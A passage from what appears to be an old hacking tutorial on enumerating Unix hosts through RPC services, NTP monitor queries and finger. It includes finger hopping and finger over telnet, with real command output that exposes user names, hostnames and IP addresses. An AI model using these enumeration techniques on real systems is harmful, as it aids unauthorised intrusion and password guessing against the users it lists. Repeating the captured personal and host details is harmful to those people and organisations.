Damn - no users logged on. Let us see if we can't find a host somewhere on
the 'net with users logged on:
# rusers -al 128.xxx.135.109
wgw xxx.edu:console Sep 19 16:11 :53 (:0)
(confirming:)
> finger @128.xxx.135.109
[128.xxx.135.109]
Login Name TTY Idle When Where
wgw William Wolber console 1:06 Tue 09:11 :0 

Another RPC service that is quite cute is the rstatdserver. This service
gives some (kinda useless) information such as uptimeand load:
> rup 210.xxx.96.151
210.xxx.96.151 1:17am up 4 days, 22:14, load average: 0.00 0.00 0.01
Should I wish to, I could write a message to all the users logged in on the
host using the r wall command (now... I don't want to do that would I, but it
would look like this):
>r wall 210.xxx.96.151
Greetings from South Africa!
^D
>
This command would write above message to the consoles of all users
connected to the host. Using this command with loops has obvious annoying
effects.
Another RPC service that is not mentioned here is the Yellow Pagessystem
(YP). YP was quite popular at some stage in large corporations and
universities, but its rare to see it today. For a very nice discussion on
ways to get juicy information from YP the best document must be Dan Farmer's
"Improving the Security of Your Site by Breaking Into it" - you can find it
here (http://www.ussrback.com/docs/papers/unix/farmer.txt).
The more serious problems with RPC services are that some of them are
exploitable. The "ttdbserver" and "cmsd" services have known problems that
would allow an attacker to execute any command on the host. These exploits
are very OS dependent, but also a very real...check your local exploit
database for the goodies.

NTP 123 UDP

Network time protocol cannot really be regarded as a exploitable service
(yet, and that I know of). In some very special situations however, it can
be useful. Let us assume that a big corporation is time syncing all their
servers to the same stratum X server. Using NTP tools, you would be able to
query the NTP server to find a list of servers (with a lower stratum level)
time syncing to this one (higher stratum level) server. Practically it will
work like this - I am going to query a stratum 1 server for a list of
machines that time synch with it (extract):
> xntpdc -c mon ntp.is.co.za
remote address port local address count m ver drop last
=======================================================================
gauntlet.didata.co.za 34974 196.33.55.162 12995 3 4 0 2 131912
fwj5.tns.co.za 34238 196.36.249.102 1738 3 3 0 3 131873
gauntlet-cpt.sanlam.co 36418 196.34.250.26 3667 4 3 0 3 111071
168.209.28.150 36468 168.209.28.150 1011 3 3 0 4 131863
fwj002-pat.fw.is.co.za 35221 196.14.136.73 32274 3 1 0 5 131915
mail2.is.co.za 36826 196.36.153.35 1110 3 3 0 5 131902
196.23.0.209 32890 196.23.0.209 14919 3 1 0 5 105141
196.15.219.132 35079 196.15.219.132 1042 3 3 0 2 131866
gauntlet.pg.co.za 35437 196.33.55.178 1322 3 3 0 1 131866
gauntlet.samiea.org.za 34313 196.35.252.97 1291 3 3 0 2 117117
real01.sabcnews.com 34324 196.14.235.121 2862 3 3 0 7 131886
sw-ded-2.hosting.co.za 34309 196.36.198.203 1646 3 3 0 7 114724
ns1.is.co.za 31753 196.4.160.7 2011 3 3 0 7 131879
gauntlet.jse.co.za 33901 196.38.196.178 2051 3 3 0 7 131870
admin.is.co.za 34587 196.23.0.9 1829 3 3 0 8 131887
Hmmm...just look at those interesting DNS names. It seems as though this
company is using this server to sync a whole lot of firewalls and other
machines (that need NTP, and the mere fact that they are using NTP says
something). As said before - this service might not be exploitable, but it
could be used for intelligence.

Finger 79 TCP

As shown in the Telnet section, fingeris very useful tool. Fingercan be
used in more situations that you would imagine. Let us look at some
interesting tricks with finger.
A fingercommand without any specified username would return all users
logged on to the server. Typical output of a fingercommand look like this:
> finger @196.xxx.129.66
[196.xxx.129.66]
Login Name Tty Idle Login Time Office Office Phone
davidssh Shuaib pts/1 Sep 12 17:35 (pc22285)
root root tty1 1d Sep 11 17:03
We see that "root" and "davidssh" is logged on. Note that "davidssh" is
active on the host - no idle time. The rest of the fields are actually quite
straightforward. Some servers do not return information unless a username is
given.
A fingercommand with a username specified returns more information about
the user. Heck NO! I think everybody knows how fingerworks (check for new
mail, check the shell) - let us jump straight to the more interesting finger
commands. A fingercommand can be done on username, or any part of the
"name" field. This statement is more interesting that you might think. Let
us show an example. Nether.netis a free shell server, and the ideal place
to test this. Observe the following fingercommand and the output (extract):
> finger test@nether.net
[nether.net]
Login Name TTY Idle When Where
test jhgsafgkdjs pts/3 <Jan 2, 2000> swara.ece.iisc.e
arcady aka test 935 <Jan 26, 2000> ppp88.dnttm.ro
k5drm TEst pts/48 <Jan 23, 2000> cm733016-a.ftwrt
test1 Test Test 165 <Jan 20, 2000> alpha1.csd.uwm.e
dogmata test pts/27 <Feb 21, 2000>
uidplate Prime Test 237 <Apr 13 13:25> gramvousa2.tem.u
testuzer test user pts/19 <Mar 25, 2000> tnt11a-154.focal
kosir Test < . . . . >
wman test pts/40 <Sep 5 18:02> FAIRVIEWPARK-189
testing Test pts/42 <Apr 22 03:08> pd01-54.inet-x.n
test1234 Test pts/47 <Apr 28 03:08> cwc373.emirates.
Information is return when any part of either the username or “real name”
matches the word "test" (not case sensitive). Imagine a system where there
is unique usernames, but a common entry in the “real name” field - a finger
on the common entry would return the information on all the users (a
university with the student number as username and "student XXXX" as real
name comes to mind).
Another interesting finger command is the finger 0@victimcommand. I have
read somewhere that this return information on users that haven't logged in.
Yippee. Just figure out the default password scheme from the system, and
these usernames is your ticket in there. Let's see it in action:
>finger 0@196.xxx.131.14
[196.xxx.131.14]
Login Name TTY Idle When Where
daemon ??? < . . . . > 
bin ??? < . . . . >
sys ??? < . . . . >
jacques ??? pts/0 <Sep 23 20:34> for36-01-p36.wc.
kim ??? pts/4 <Aug 22 21:03> 196.xxx.134.xx
oracle ??? pts/0 <Aug 11 12:22> cte-nms.xxxxx
langh ??? pts/2 <Aug 11 11:02> 196.25.xxx.207
david ??? pts/0 <Sep 20 08:27> oogly.xxx.co.za
ars ??? pts/2 <Sep 20 11:33> 196.25.xxx.140
arsystem ??? < . . . . >
Now this is what I don't get - if finger 0returns users that haven't logged
in, how come some "where" fields are populated? This fingercommand rarely
works - SUN/Solaris Unix is the only variant (that I came across) that
exhibits this behavior (finger .@victimsometimes produce the same results -
experiment).
Finger hopping works like this - finger [whatever]@victim1@victim2. Let us
assume that the finger port on victim1 is blocked:
# finger @196.xxx.131.12
[196.41.131.12]
finger: read: Operation timed out
We know that the finger port on victim2 is open:
# finger @196.xxx.131.14
[196.41.131.14]
No one logged on
Now, let us hop from victim2 to victim1:
# finger @196.xxx.131.12@196.xxx.131.14
[196.xxx.131.14]
[196.xxx.131.12]
Login Name TTY Idle When Where
root Super-User console 9:07 Mon 11:44 :0
Ha! Information is returned from victim1, although the finger port is
blocked. Should victim1 have logged the fingerrequest (it's rarely logged
really), it would seems as though the request was coming from victim2.
Obviously this type of fingercommand can be crafted as wished (e.g. Finger
-l 0@v1@v2)
Fingeris really just a client for the finger service that lives on port 79.
Und? Situation: you compromised a router, having a prompt, and you wish to
attack a Unix server behind the router. You want to use the finger command
to get valid usernames, but the router does not have a finger client. The
fingercan be done using a normal TCP connection - initiated by the telnet
client. Examples:
> telnet 196.xxx.131.14 79
Trying 196.xxx.131.14...
Connected to xxx.co.za.
Escap
<cr>
e character is '^]'.
No one logged on
Connection closed by foreign host.
> telnet 196.xxx.131.14 79
Trying 196.xxx.131.14...
Connected to xxx.co.za.
Escape character is '^]'.
root
Login Name TTY Idle When Where
root Super-User console <Sep 18 11:46>
Connection closed by foreign host. 
Any kind of fingercan be performed this way - simple enter field before the
@after the connection has been established.